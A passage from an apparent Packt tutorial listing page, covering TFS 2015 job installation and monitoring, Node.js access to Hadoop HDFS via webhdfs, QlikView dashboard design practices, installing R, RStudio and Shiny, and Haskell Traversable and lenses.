Now that we have this code in the program.cs file, we need to compile the project and then copy TfsJobSample.exe and TfsJobSample.pdb to the TFS Tools folder, which is C:\Program Files\Microsoft Team Foundation Server 14.0\Tools.
Now open a cmd window as an administrator. Change the directory to the Tools folder and then run your application with the /i command.

(Figure: Installing the TFS Job)

Now, you have successfully installed the TFS Job. To uninstall it or force it to be queued, you will need the job ID. To uninstall, run the application with the /u command followed by the job ID.

(Figure: Uninstalling the TFS Job)

Queuing follows the same approach: specify the /q command and the job ID.

How do I know whether my TFS Job is running?

The easiest way to check whether your TFS Job is running is to look at the job history table in the configuration database. To do this, you will need the job ID mentioned earlier, which you can obtain by running the following query against the TFS_Configuration database:

    SELECT JobId
    FROM Tfs_Configuration.dbo.tbl_JobDefinition WITH (NOLOCK)
    WHERE JobName = 'Comments to Change Set Links Job'

With this JobId, we will then run the following query against the job history:

    SELECT *
    FROM Tfs_Configuration.dbo.tbl_JobHistory WITH (NOLOCK)
    WHERE JobId = '<place the JobId from previous query here>'

This will return a list of results for the previous times the job was run. If you see that your job has a Result of 6, which means extension not found, then you will need to stop and restart the TFS job agent. You can do this by running the following commands in an Administrator cmd window:

    net stop TfsJobAgent
    net start TfsJobAgent

Note that when you stop the TFS job agent, any jobs that are currently running will be terminated. They will not get a chance to save their state, which, depending on how they were written, could lead to some unexpected situations when they start again. After the agent has started again, you will see that the Result field is now different, because the restarted job agent knows about your job.
If you prefer browsing the web to see the status of your jobs, you can browse to the job monitoring page (_oi/_jobMonitoring#_a=history), for example, http://gordon-lappy:8080/tfs/_oi/_jobMonitoring#_a=history. This will give you all the data that you can normally query but with nice graphs and grids.

Summary

In this article, we looked at how to write, install, uninstall, and queue a TFS Job. You learned that the way we used to install TFS Jobs will no longer work for TFS 2015 because of a change in the Client Object Model for security.

Harri Siirak

25 Sep 2015

5 min read

Using Node.js and Hadoop to store distributed data

Hadoop is a well-known open-source software framework for distributed storage and distributed processing of very large data sets on computer clusters built from commodity hardware. It's designed with the fundamental assumption that hardware failures can (and will) happen and thus should be handled automatically in software by the framework. Under the hood, it uses HDFS (Hadoop Distributed File System) for data storage. HDFS can store large files across multiple machines, and it achieves reliability by replicating the data across multiple hosts (the default replication factor is 3 and can be configured to be higher when needed). However, it's designed for mostly immutable files and may not be suitable for systems requiring concurrent write operations. Its use is not restricted to MapReduce jobs; it can also serve as cost-effective and reliable data storage.

In the following examples, I am going to give you an overview of how to establish connections to HDFS storage (namenode) and how to perform basic operations on the data. As you can probably guess, I'm using Node.js to build these examples. Node.js is a platform built on Chrome's JavaScript runtime for easily building fast, scalable network applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, perfect for data-intensive real-time applications that run across distributed devices. So it's really ideal for what I want to show you next.

Two popular libraries for accessing HDFS in Node.js are node-hdfs and webhdfs. The first one uses Hadoop's native libhdfs library and protocol to communicate with the Hadoop namenode, although it no longer appears to be maintained and doesn't support the Stream API.
The second one uses WebHDFS, which defines a public HTTP REST API built directly into Hadoop's core (both namenodes and datanodes). It permits clients to access Hadoop from multiple languages without installing Hadoop, and it supports all HDFS user operations, including reading files, writing to files, making directories, changing permissions, and renaming. More details about the WebHDFS REST API, its implementation, and its response codes and types can be found in the Hadoop WebHDFS documentation.

At this point, I'm assuming that you have a Hadoop cluster up and running. There are plenty of good tutorials out there showing how to set up and run a Hadoop cluster (single and multi-node).

Installing and using the webhdfs library

webhdfs implements most of the REST API calls, although it does not yet support Hadoop delegation tokens. It's also Stream API compatible, which makes its usage pretty straightforward. Detailed examples and use cases for the other supported calls can be found in the library's documentation. Install webhdfs from npm:

    npm install webhdfs

Create a new script named webhdfs-client.js:

    // Include webhdfs module
    var WebHDFS = require('webhdfs');

    // Create a new client instance
    var hdfs = WebHDFS.createClient({
      user: 'hduser',    // Hadoop user
      host: 'localhost', // Namenode host
      port: 50070        // Namenode port
    });

    module.exports = hdfs;

Here we initialized a new webhdfs client with options, including the host and port of the namenode that we are connecting to. Let's proceed with a more detailed example.

Storing file data in HDFS

Create a new script named webhdfs-write-test.js and add the code below.
    // Include created client
    var hdfs = require('./webhdfs-client');

    // Include fs module for local file system operations
    var fs = require('fs');

    // Initialize readable stream from local file
    // Change this to real path in your file system
    var localFileStream = fs.createReadStream('/path/to/local/file');

    // Initialize writable stream to HDFS target
    var remoteFileStream = hdfs.createWriteStream('/path/to/remote/file');

    // Pipe data to HDFS
    localFileStream.pipe(remoteFileStream);

    // Handle errors
    remoteFileStream.on('error', function onError (err) {
      // Do something with the error
    });

    // Handle finish event
    remoteFileStream.on('finish', function onFinish () {
      // Upload is done
    });

Basically, what we are doing here is initializing a readable file stream from the local filesystem and piping its contents into the remote HDFS target. The write stream also emits error and finish events, which you can optionally handle.

Reading file data from HDFS

Let's retrieve the data that we just stored in HDFS. Create a new script named webhdfs-read-test.js and add the code below.

    var hdfs = require('./webhdfs-client');
    var fs = require('fs');

    // Initialize readable stream from HDFS source
    var remoteFileStream = hdfs.createReadStream('/path/to/remote/file');

    // Variable for storing data (start with an empty buffer)
    var data = Buffer.alloc(0);

    remoteFileStream.on('error', function onError (err) {
      // Do something with the error
    });

    remoteFileStream.on('data', function onChunk (chunk) {
      // Concat received data chunk
      data = Buffer.concat([ data, chunk ]);
    });

    remoteFileStream.on('finish', function onFinish () {
      // Download is done
      // Print received data
      console.log(data.toString());
    });

What's next?

Now that we have data in the Hadoop cluster, we can start processing it by spawning some MapReduce jobs, and when it's processed, we can retrieve the output data. In the second part of this article, I'm going to give you an overview of how Node.js can be used as part of MapReduce jobs.
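The chunk-collecting pattern from the read example can be tried without a cluster. The following is a minimal sketch, assuming a recent Node.js version: it uses an in-memory stream from Node's core stream module as a stand-in for an HDFS read stream, and the helper names joinChunks and collectStream are hypothetical. Core readable streams signal completion with the end event, so that is what the sketch listens for. It also keeps the chunks in an array and joins them once, rather than re-concatenating on every chunk.

```javascript
// Sketch only: an in-memory stream stands in for an HDFS read stream.
const { Readable } = require('stream');

// Join a list of Buffer chunks into a single Buffer.
function joinChunks(chunks) {
  return Buffer.concat(chunks);
}

// Collect everything a readable stream emits; resolves with one Buffer.
function collectStream(stream) {
  return new Promise(function (resolve, reject) {
    const chunks = [];
    stream.on('data', function (chunk) {
      chunks.push(Buffer.from(chunk));
    });
    stream.on('error', reject);
    stream.on('end', function () {
      resolve(joinChunks(chunks));
    });
  });
}

// Hypothetical data; no Hadoop cluster is involved here.
const fakeRemote = Readable.from([Buffer.from('hello '), Buffer.from('hdfs')]);

collectStream(fakeRemote).then(function (data) {
  console.log(data.toString());
});
```

Joining once at the end avoids copying the accumulated data on every chunk, which matters more as the files get larger.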
About the author Harri is a senior Node.js/Javascript developer among a talented team of full-stack developers who specialize in building scalable and secure Node.js based solutions. He can be found on Github at harrisiirak.

How-To Tutorials

Packt

25 Sep 2015

16 min read

Building JSF Forms

How-To Tutorials

Packt

25 Sep 2015

11 min read

The Dashboard Design – Best Practices

In this article by Julian Villafuerte, author of the book Creating Stunning Dashboards with QlikView, you will learn more about the best practices for dashboard design.

Data visualization is a field that is constantly evolving. However, some concepts have proven their value time and again through the years and have become what we call best practices. These notions should not be seen as strict rules that must be applied without any further consideration but as a series of tips that will help you create better applications. If you are a beginner, try to stick to them as much as you can. These best practices will save you a lot of trouble and will greatly enhance your first endeavors. On the other hand, if you are an advanced developer, combine them with your personal experience in order to build the ultimate dashboard.

Some guidelines in this article come from well-known figures in the field of data visualization, such as Stephen Few, Edward Tufte, John Tukey, Alberto Cairo, and Nathan Yau. So, if a concept catches your attention, I strongly recommend that you read more about it in their books. Throughout this article, we will review some useful recommendations that will help you create dashboards that are not only engaging but also effective and user-friendly. Remember that they may apply differently depending on the information displayed and the audience you are working with. Nevertheless, they are great guidelines for the field of data visualization, so do not hesitate to consider them in all of your developments.

Gestalt principles

In the early 1900s, the Gestalt school of psychology conducted a series of studies on human perception in order to understand how our brain interprets forms and recognizes patterns.
Understanding these principles may help you create a better structure for your dashboard and make your charts easier to interpret:

Proximity: When we see multiple elements located near one another, we tend to see them as groups. For example, we can visually distinguish clusters in a scatter plot by grouping the dots according to their position.
Similarity: Our brain associates the elements that are similar to each other (in terms of shape, size, color, or orientation). For example, in color-coded bar charts, we can associate the bars that share the same color even if they are not grouped.
Enclosure: If a border surrounds a series of objects, we perceive them as part of a group. For example, if a scatter plot has reference lines that wrap the elements between 20 and 30 percent, we will automatically see them as a cluster.
Closure: When we detect a figure that looks incomplete, we tend to perceive it as a closed structure. For example, even if we discard the borders of a bar chart, the axes will form a region that our brain will isolate without needing the extra lines.
Continuity: If a number of objects are aligned, we will perceive them as a continuous body. For example, when you indent QlikView script, the aligned lines of each block are perceived as one continuous unit.
Connection: If objects are connected by a line, we will see them as a group. For example, in a scatter plot drawn with lines and symbols, we tend to associate the dots that are connected by lines.

Giving context to the data

When it comes to analyzing data, context is everything. If you present isolated figures, the users will have a hard time trying to find the story hidden behind them. For example, if I told you that the gross margin of our company was 16.5 percent during the first quarter of 2015, would you evaluate it as a positive or negative sign? This is pretty difficult, right? However, what if we added some extra information to complement this KPI?
Then, the following image would make a lot more sense: As you can see, adding context to the data can make the landscape look quite different. Now, it is easy to see that even though the gross margin has substantially improved during the last year, our company has some work to do in order to be competitive and surpass the industry standard. The appropriate references may change depending on the KPI you are dealing with and the goals of the organization, but some common examples are as follows: Last year's performance The quota, budget, or objective Comparison with the closest competitor, product, or employee The market share The industry standards Another good tip in this regard is to anticipate the comparisons. If you display figures regarding the monthly quota and the actual sales, you can save the users the mental calculations by including complementary indicators, such as the gap between them and the percentage of completion. Data-Ink Ratio One of the most interesting principles in the field of data visualization is Data-Ink Ratio, introduced by Edward R. Tufte in his book, The Visual Display of Quantitative Information, which must be read by every designer. In this publication, he states that there are two different types of ink (or in our case, pixels) in any chart, as follows: Data-ink: This includes all the nonerasable portions of graphic that are used to represent the actual data. These pixels are at the core of the visualization and cannot be removed without losing some of its content. Non-data-ink: This includes any element that is not directly related to the data or doesn't convey anything meaningful to the reader. Based on these concepts, he defined the Data Ink Ratio as the proportion of the graphic's ink that is devoted to the nonredundant display of data information: Data Ink Ratio = Data Ink / Total Ink As you can imagine, our goal is to maximize this number by decreasing the non-data-ink used in our dashboards. 
For example, the chart to the left has a low data-ink ratio due to the usage of 3D effects, shadows, backgrounds, and multiple grid lines. On the contrary, the chart to the right presents a higher ratio as most of the pixels are data-related. Avoiding chart junk Chart junk is another term coined by Tufte that refers to all the elements that distract the viewer from the actual information in a graphic. Evidently, chart junk is considered as non-data-ink and comprises of features such as heavy gridlines, frames, redundant labels, ornamental axes, backgrounds, overly complex fonts, shadows, images, or other effects included only as decoration. Take for instance the following charts: As you can see, by removing all the unnecessary elements in a chart, it becomes easier to interpret and looks much more elegant. Balance Colors, icons, reference lines, and other visual cues can be very useful to help the users focus on the most important elements in a dashboard. However, misusing or overusing these features can be a real hazard, so try to find the adequate balance for each of them. Excessive precision QlikView applications should use the appropriate language for each audience. When designing, think about whether precise figures will be useful or if they are going to become a distraction. Most of the time, dashboards show high-level KPIs, so it may be more comfortable for certain users to see rounded numbers, as in the following image: 3D charts One of Microsoft Excel's greatest wrongdoings is making everyone believe that 3D charts are good for data analysis. For some reason, people seem to love them; but, believe me, they are a real threat to business analysts. Despite their visual charm, these representations can easily hide some parts of the information and convey wrong perceptions depending on their usage of colors, shadows, and axis inclination. I strongly recommend you to avoid them in any context. 
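The earlier tip about excessive precision comes down to simple arithmetic: scale the figure and keep one decimal. The sketch below illustrates that rounding in JavaScript; it is not QlikView expression syntax, and the function name formatKpi and the one-decimal thresholds are assumptions chosen for illustration.

```javascript
// Sketch only: formatKpi is a hypothetical helper, not a QlikView function.
// It turns a precise figure into a compact, rounded dashboard label.
function formatKpi(value) {
  const abs = Math.abs(value);
  if (abs >= 1e9) return (value / 1e9).toFixed(1) + 'B'; // billions
  if (abs >= 1e6) return (value / 1e6).toFixed(1) + 'M'; // millions
  if (abs >= 1e3) return (value / 1e3).toFixed(1) + 'K'; // thousands
  return String(Math.round(value));                      // small values: whole numbers
}

console.log(formatKpi(1234567));
console.log(formatKpi(2500));
```

Whether one decimal is the right level of detail depends on the audience; the exact figure can still be shown in a detail view for users who need it.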
Sorting

Whether you are working with a list box, a bar chart, or a straight table, sorting an object is always advisable, as it adds context to the data. It can help you find the most commonly selected items in a list box, distinguish which slice is bigger on a pie chart when the sizes are similar, or easily spot the outliers in other graphic representations.

Alignment and distribution

Most of my colleagues argue that I am on the verge of an obsessive-compulsive disorder, but I cannot stand an application with unaligned objects. (Actually, I am still struggling with the fact that the paragraphs in this book are not justified, but anyway...). The design toolbar offers useful options in this regard, so there is no excuse for not having a tidy dashboard. If you take care of the alignment of all the charts and filters, your interface will display a clean and professional look that every user will appreciate.

Animations

I have a rule of thumb regarding chart animation in QlikView: if you are Hans Rosling, go ahead. If not, think twice. Even though they can be very illustrative, most of the time chart animations end up being a distraction rather than a tool to help us visualize data, so be conservative about their use. For those of you who do not know him, Hans Rosling is a Swedish professor of international health who works in Stockholm. However, he is best known for his amazing way of presenting data with GapMinder, a simple piece of software that allows him to animate a scatter plot. If you are a data enthusiast, you ought to watch his appearances in TED Talks.

Avoiding scroll bars

Throughout his work, Stephen Few emphasizes that all the information in a dashboard must fit on a single screen. Whilst I believe that there is no harm in splitting the data across multiple sheets, it is undeniable that scroll bars reduce the overall usability of an application.
If the user has to continuously scroll right and left to read all the figures in a table, or if she must go up and down to see the filter panel, she will end up getting tired and eventually discard your dashboard. Consistency If you want to create an easy way to navigate your dashboard, you cannot forget about consistency. Locating standard objects (such as Current Selections Box, Search Object, and Filter Panels) in the same area in every tab will help the users easily find all the items they need. In addition, applying the same style, fonts, and color palettes in all your charts will make your dashboard look more elegant and professional. White space The space between charts, tables, and filters is often referred to as white space, and even though you may not notice it, it is a vital part of any dashboard. Displaying dozens of objects without letting them breathe makes your interface look cluttered and, therefore, harder to understand. Some of the benefits of using white space adequately are: The improvement in readability It focuses and emphasizes the important objects It guides the users' eyes, creating a sense of hierarchy in the dashboard It fosters a balanced layout, making your interface look clear and sophisticated Applying makeup Every now and then, you stumble upon delicate situations where some business users try their best to hide certain parts of the data. Whether it is about low sales or the insane amount of defective products, they often ask you to remove a few charts or avoid visual cues so that those numbers go unnoticed. Needless to say, dashboards are tools intended to inform and guide the decisions of the viewers, so avoid presenting misleading visualizations. Meaningless variety As a designer, you will often hesitate to use the same chart type multiple times in your application fearing that the users will get bored of it. 
Though this may be a haunting perception, if you present valuable data in an adequate format, there is no need to add new types of charts just for variety's sake. We want to keep the users engaged with great analyses, not just with pretty graphics.

Summary

In this article, you learned about the best practices to follow when designing dashboards in QlikView.

Packt

25 Sep 2015

9 min read

Introducing R, RStudio, and Shiny

In this article, by Hernán G. Resnizky, author of the book Learning Shiny, the main objective will be to learn how to install all the needed components to build an application in R with Shiny. Additionally, some general ideas about what R is will be covered in order to be able to dive deeper into programming using R. The following topics will be covered: A brief introduction to R, RStudio, and Shiny Installation of R and Shiny General tips and tricks (For more resources related to this topic, see here.) About R As stated on the R-project main website: "R is a language and environment for statistical computing and graphics." R is a successor of S and is a GNU project. This means, briefly, that anyone can have access to its source codes and can modify or adapt it to their needs. Nowadays, it is gaining territory over classic commercial software, and it is, along with Python, the most used language for statistics and data science. Regarding R's main characteristics, the following can be considered: Object oriented: R is a language that is composed mainly of objects and functions. Can be easily contributed to: Similar to GNU projects, R is constantly being enriched by user's contributions either by making their codes accessible via "packages" or libraries, or by editing/improving its source code. There are actually almost 7000 packages in the common R repository, Comprehensive R Archive Network (CRAN). Additionally, there are R repositories of public access, such as bioconductor project that contains packages for bioinformatics. Runtime execution: Unlike C or Java, R does not need compilation. This means that you can, for instance, write 2 + 2 in the console and it will return the value. Extensibility: The R functionalities can be extended through the installation of packages and libraries. Standard proven libraries can be found in CRAN repositories and are accessible directly from R by typing install.packages(). 
Installing R R can be installed in every operating system. It is highly recommended to download the program directly from http://cran.rstudio.com/ when working on Windows or Mac OS. On Ubuntu, R can be easily installed from the terminal as follows: sudo apt-get update sudo apt-get install r-base sudo apt-get install r-base-dev The installation of r-base-dev is highly recommended as it is a package that enables users to compile the R packages from source, that is, maintain the packages or install additional R packages directly from the R console using the install.packages() command. To install R on other UNIX-based operating systems, visit the following links: http://cran.rstudio.com/ http://cran.r-project.org/doc/manuals/r-release/R-admin.html#Obtaining-R A quick guide to R When working on Windows, R can be launched via its application. After the installation, it is available as any other program on Windows. When opening the program, a window like this will appear: When working on Linux, you can access the R console directly by typing R on the command line: In both the cases, R executes in runtime. This means that you can type in code, press Enter, and the result will be given immediately as follows: > 2+2 [1] 4 The R application in any operating system does not provide an easy environment to develop code. For this reason, it is highly recommended (not only to write web applications in R with Shiny, but for any task you want to perform in R) to use an Integrated Development Environment (IDE). About RStudio As with other programming languages, there is a huge variety of IDEs available for R. IDEs are applications that make code development easier and clearer for the programmer. RStudio is one of the most important ones for R, and it is especially recommended to write web applications in R with Shiny because this contains features specially designed for R. 
Additionally, RStudio provides facilities to write C++, LaTeX, or HTML documents and to integrate them with R code. RStudio also provides version control, project management, and debugging features, among many others.

Installing RStudio

RStudio for desktop computers can be downloaded from its official website at http://www.rstudio.com/products/rstudio/download/, where you can get versions of the software for Windows, Mac OS X, Ubuntu, Debian, and Fedora.

Quick guide to RStudio

Before installing and running RStudio, it is important to have R installed. As RStudio is an IDE and not the programming language itself, it will not work at all without R. The following screenshot shows RStudio's starting view:

At first glance, the following four main windows are available:

Text editor: This provides facilities for writing R scripts, such as highlighting and code completion (when hitting Tab, you can see the available options to complete the code written). It is also possible to include R code in an HTML, LaTeX, or C++ piece of code.
Environment and history: They are defined as follows:
In the Environment section, you can see the active objects in each environment. By clicking on Global Environment (which is the environment shown by default), you can change the environment and see the active objects.
In the History tab, the pieces of code executed are stored line by line. You can select one or more lines and send them either to the editor or to the console. In addition, you can look up a specific piece of code by typing it in the textbox in the top right part of this window.
Console: This is an exact equivalent of the R console, as described in A quick guide to R.
Tabs: The different tabs are defined as follows:
Files: This consists of a file browser with several additional features (renaming, deleting, and copying). Clicking on a file will open it in the editor or the Environment tab depending on the type of the file. If it is a .rda or .RData file, it will open in both.
If it is a text file, it will open in one of them.
Plots: Whenever a plot is executed, it will be displayed in that tab.
Packages: This shows a list of available and active packages. When a package is active, it will appear as checked. Packages can also be installed interactively by clicking on Install Packages.
Help: This is a window to search and read the documentation of active packages.
Viewer: This enables us to see HTML-generated content within RStudio.

Along with numerous features, RStudio also provides keyboard shortcuts. A few of them are listed as follows:

Description | Windows/Linux | OS X
Complete the code. | Tab | Tab
Run the selected piece of code. If no piece of code is selected, the active line is run. | Ctrl + Enter | ⌘ + Enter
Comment the selected block of code. | Ctrl + Shift + C | ⌘ + /
Create a section of code, which can be expanded or compressed by clicking on the arrow to the left. Additionally, it can be accessed by clicking on it in the bottom left menu. | ##### | #####
Find and replace. | Ctrl + F | ⌘ + F

The following screenshots show how a block of code can be collapsed by clicking on the arrow and how it can be accessed quickly by clicking on its name in the bottom-left part of the window:

Clicking on the circled arrow will collapse the Section 1 block, as follows:

The full list of shortcuts can be found at https://support.rstudio.com/hc/en-us/articles/200711853-Keyboard-Shortcuts.

For further information about other RStudio features, the full documentation is available at https://support.rstudio.com/hc/en-us/categories/200035113-Documentation.

About Shiny

Shiny is a package created by RStudio that makes it easy to interface R with a web browser. As stated in its official documentation, Shiny is a web application framework for R that makes it incredibly easy to build interactive web applications with R.
One of its main advantages is that there is no need to combine R code with HTML/JavaScript code, as the framework already contains prebuilt features that cover the most commonly used functionalities in an interactive web application. There is a wide range of software that has web application functionalities, especially oriented to interactive data visualization. What are the advantages of using R/Shiny then, you ask? They are as follows:

It is free not only in terms of money but, like all GNU projects, in terms of freedom. As stated on the GNU main page: "To understand the concept (GNU), you should think of free as in free speech, not as in free beer. Free software is a matter of the users' freedom to run, copy, distribute, study, change, and improve the software."
All the possibilities of a powerful language such as R are available. Thanks to its contributive essence, you can develop a web application that can display any R-generated output. This means that you can, for instance, run complex statistical models and return the output in a friendly way in the browser, obtain and integrate data from various sources and formats (for instance, SQL, XML, JSON, and so on) the way you need, and subset, process, and dynamically aggregate the data the way you want. These options are not available (or are much more difficult to accomplish) under most of the commercial BI tools.

Installing and loading Shiny

As with any other package available in the CRAN repositories, the easiest way to install Shiny is by executing install.packages("shiny"). The following output should appear on the console:

Due to R's extensibility, many of its packages use elements (mostly functions) from other packages. For this reason, these packages are loaded or installed when the package that depends on them is loaded or installed. This is called a dependency. Shiny (as of version 0.10.2.1) depends on Rcpp, httpuv, mime, htmltools, and R6.

An R session is started with only the minimal packages loaded.
So if functions from other packages are used, those packages need to be loaded before using them. The corresponding command for this is as follows:

    library(shiny)

When installing a package, the package name must be quoted, but when loading the package, the name can be given unquoted.

Summary

After these instructions, the reader should be able to install all the fundamental elements needed to create a web application with Shiny. Additionally, he or she should have acquired at least a general idea of what R and the R project are.

Resources for Article:

Further resources on this subject:
R - Classification and Regression Trees [article]
An overview of common machine learning tasks [article]
Taking Control of Reactivity, Inputs, and Outputs [article]


How-To Tutorials

Packt

25 Sep 2015

15 min read

Patterns of Traversing

In this article by Ryan Lemmer, author of the book Haskell Design Patterns, we will focus on two fundamental patterns of recursion: fold and map. The more primitive forms of these patterns are to be found in the Prelude, the "old part" of Haskell. With the introduction of Applicative came more powerful mapping (traversal), which opened the door to type-level folding and mapping in Haskell. First, we will look at how Prelude's list fold is generalized to all Foldable containers. Then, we will follow the generalization of list map to all Traversable containers. Our exploration of fold and map culminates with the Lens library, which raises Foldable and Traversable to an even higher level of abstraction and power.

In this article, we will cover the following:

Traversable
Modernizing Haskell
Lenses

Traversable

As with Prelude.foldM, mapM fails us beyond lists. For example, we cannot mapM over the Tree from earlier:

    main = mapM doF aTree >>= print -- INVALID

The Traversable type-class is to map as Foldable is to fold:

    -- required: traverse or sequenceA
    class (Functor t, Foldable t) => Traversable (t :: * -> *) where
      -- APPLICATIVE form
      traverse  :: Applicative f => (a -> f b) -> t a -> f (t b)
      sequenceA :: Applicative f => t (f a) -> f (t a)
      -- MONADIC form (redundant)
      mapM      :: Monad m => (a -> m b) -> t a -> m (t b)
      sequence  :: Monad m => t (m a) -> m (t a)

The traverse function generalizes our mapA function, which was written for lists, to all Traversable containers.
Similarly, Traversable.mapM is a more general version of Prelude.mapM for lists:

    mapM :: Monad m => (a -> m b) -> [a] -> m [b]
    mapM :: Monad m => (a -> m b) -> t a -> m (t b)

The Traversable type-class was introduced along with Applicative:

"we introduce the type class Traversable, capturing functorial data structures through which we can thread an applicative computation"
Applicative Programming with Effects - McBride and Paterson

A Traversable Tree

Let's make our Tree Traversable. First, we'll do it the hard way. A Traversable must also be a Functor and Foldable:

    instance Functor Tree where
      fmap f (Leaf x) = Leaf (f x)
      fmap f (Node x lTree rTree) = Node (f x) (fmap f lTree) (fmap f rTree)

    instance Foldable Tree where
      foldMap f (Leaf x) = f x
      foldMap f (Node x lTree rTree) = (foldMap f lTree) `mappend` (f x) `mappend` (foldMap f rTree)

    -- traverse :: Applicative ma => (a -> ma b) -> mt a -> ma (mt b)
    instance Traversable Tree where
      traverse g (Leaf x) = Leaf <$> (g x)
      traverse g (Node x ltree rtree) = Node <$> (g x) <*> (traverse g ltree) <*> (traverse g rtree)

    data Tree a = Node a (Tree a) (Tree a) | Leaf a deriving (Show)

    aTree = Node 2 (Leaf 3) (Node 5 (Leaf 7) (Leaf 11))

    -- import Data.Traversable
    main = traverse doF aTree
      where doF n = do print n; return (n * 2)

The easier way to do this is to auto-implement Functor, Foldable, and Traversable:

    {-# LANGUAGE DeriveFunctor #-}
    {-# LANGUAGE DeriveFoldable #-}
    {-# LANGUAGE DeriveTraversable #-}

    import Data.Traversable

    data Tree a = Node a (Tree a) (Tree a) | Leaf a
      deriving (Show, Functor, Foldable, Traversable)

    aTree = Node 2 (Leaf 3) (Node 5 (Leaf 7) (Leaf 11))

    main = traverse doF aTree
      where doF n = do print n; return (n * 2)

Traversal and the Iterator pattern

The Gang of Four Iterator pattern is concerned with providing a way

"...to access the elements of an aggregate object sequentially without exposing its underlying representation"
"Gang of Four" Design Patterns, Gamma et al, 1995

In The Essence of the Iterator Pattern, Jeremy Gibbons shows precisely how the Applicative traversal captures the Iterator pattern. The Traversable.traverse function is the Applicative version of Traversable.mapM, which means it is more general than mapM (because Applicative is more general than Monad). Moreover, because mapM does not rely on the Monadic bind chain to communicate between iteration steps, Monad is a superfluous type for mapping with effects (Applicative is sufficient). In other words, Applicative traverse is superior to Monadic traversal (mapM):

"In addition to being parametrically polymorphic in the collection elements, the generic traverse operation is parametrised along two further dimensions: the datatype being traversed, and the applicative functor in which the traversal is interpreted"

"The improved compositionality of applicative functors over monads provides better glue for fusion of traversals, and hence better support for modular programming of iterations"
The Essence of the Iterator Pattern - Jeremy Gibbons

Modernizing Haskell 98

The introduction of Applicative, along with Foldable and Traversable, had a big impact on Haskell. Foldable and Traversable lift Prelude fold and map to a much higher level of abstraction. Moreover, Foldable and Traversable also bring a clean separation between processes that preserve or discard the shape of the structure that is being processed. Traversable describes processes that preserve the shape of the data structure being traversed over. Foldable processes, in turn, discard or transform the shape of the structure being folded over. Since Traversable is a specialization of Foldable, we can say that shape preservation is a special case of shape transformation. This line between shape preservation and transformation is clearly visible from the fact that functions that discard their results (for example, mapM_, forM_, sequence_, and so on) are in Foldable, while their shape-preserving counterparts are in Traversable.
Due to the relatively late introduction of Applicative, the benefits of Applicative, Foldable, and Traversable have not yet found their way into the core of the language. This is due to change with the Foldable Traversable In Prelude proposal (planned for inclusion in the core libraries from GHC 7.10). For more information, visit https://wiki.haskell.org/Foldable_Traversable_In_Prelude. This will involve replacing less generic functions in Prelude, Control.Monad, and Data.List with their more polymorphic counterparts in Foldable and Traversable.

There have been objections to the movement to modernize, the main concern being that more generic types are harder to understand, which may compromise Haskell as a learning language. These valid concerns will indeed have to be addressed, but it seems certain that the Haskell community will not resist climbing to new abstract heights.

Lenses

A Lens is a type that provides access to a particular part of a data structure. Lenses express a high-level pattern for composition. However, Lens is also deeply entwined with Traversable, and so we describe it in this article instead. Lenses relate to the getter and setter functions, which also describe access to parts of data structures. To find our way to the Lens abstraction (as per Edward Kmett's Lens library), we'll start by writing a getter and setter to access the root node of a Tree.
Deriving Lens

Returning to our Tree from earlier:

    data Tree a = Node a (Tree a) (Tree a) | Leaf a deriving (Show)

    intTree = Node 2 (Leaf 3) (Node 5 (Leaf 7) (Leaf 11))
    listTree = Node [1,1] (Leaf [2,1]) (Node [3,2] (Leaf [5,2]) (Leaf [7,4]))
    tupleTree = Node (1,1) (Leaf (2,1)) (Node (3,2) (Leaf (5,2)) (Leaf (7,4)))

Let's start by writing generic getter and setter functions:

    getRoot :: Tree a -> a
    getRoot (Leaf z) = z
    getRoot (Node z _ _) = z

    setRoot :: Tree a -> a -> Tree a
    setRoot (Leaf z) x = Leaf x
    setRoot (Node z l r) x = Node x l r

    main = do
      print $ getRoot intTree
      print $ setRoot intTree 11
      print $ getRoot (setRoot intTree 11)

If we want to pass in a setter function instead of setting a value, we use the following:

    fmapRoot :: (a -> a) -> Tree a -> Tree a
    fmapRoot f tree = setRoot tree newRoot
      where newRoot = f (getRoot tree)

We have to do a get, apply the function, and then set the result. This double work is akin to the double traversal we saw when writing traverse in terms of sequenceA. In that case, we resolved the issue by defining traverse first (and then sequenceA in terms of traverse). We can do the same thing here by writing fmapRoot to work in a single step (and then rewriting setRoot' in terms of fmapRoot'):

    fmapRoot' :: (a -> a) -> Tree a -> Tree a
    fmapRoot' f (Leaf z) = Leaf (f z)
    fmapRoot' f (Node z l r) = Node (f z) l r

    setRoot' :: Tree a -> a -> Tree a
    setRoot' tree x = fmapRoot' (\_ -> x) tree

    main = do
      print $ setRoot' intTree 11
      print $ fmapRoot' (*2) intTree

The fmapRoot' function delivers a function to a particular part of the structure and returns the same structure:

    fmapRoot' :: (a -> a) -> Tree a -> Tree a

To allow for I/O, we need a new function:

    fmapRootIO :: (a -> IO a) -> Tree a -> IO (Tree a)

We can generalize this beyond I/O to all Monads:

    fmapM :: Monad m => (a -> m a) -> Tree a -> m (Tree a)

It turns out that if we relax the requirement for Monad, and generalize m to any Functor container type f', then we get a simple van Laarhoven Lens!
    -- the quantified f' requires the RankNTypes extension
    type Lens' s a = forall f'. Functor f' => (a -> f' a) -> s -> f' s

The remarkable thing about a van Laarhoven Lens is that given the preceding function type, we also gain "get", "set", "fmap", "mapM", and many other functions and operators. The Lens function type signature is all it takes to make something a Lens that can be used with the Lens library. It is unusual to use a type signature as the "primary interface" for a library. The immediate benefit is that we can define a lens without referring to the Lens library. We'll explore more benefits and costs to this approach, but first let's write a few lenses for our Tree.

The derivation of the Lens abstraction used here has been based on Jakub Arnold's Lens tutorial, which is available at http://blog.jakubarnold.cz/2014/07/14/lens-tutorial-introduction-part-1.html.

Writing a Lens

A Lens is said to provide focus on an element in a data structure. Our first lens will focus on the root node of a Tree. Using the lens type signature as our guide, we arrive at:

    lens' :: Functor f' => (a -> f' a) -> s -> f' s
    root  :: Functor f' => (a -> f' a) -> Tree a -> f' (Tree a)

Still, this is not very tangible; fmapRootIO is easier to understand with the Functor f' being IO:

    fmapRootIO :: (a -> IO a) -> Tree a -> IO (Tree a)
    fmapRootIO g (Leaf z) = (g z) >>= return . Leaf
    fmapRootIO g (Node z l r) = (g z) >>= return . (\x -> Node x l r)

    displayM x = print x >> return x

    main = fmapRootIO displayM intTree

If we drop down from Monad into Functor, we have a Lens for the root of a Tree:

    root :: Functor f' => (a -> f' a) -> Tree a -> f' (Tree a)
    root g (Node z l r) = fmap (\x -> Node x l r) (g z)
    root g (Leaf z) = fmap Leaf (g z)

As Monad is a Functor, this function also works with Monadic functions:

    main = root displayM intTree

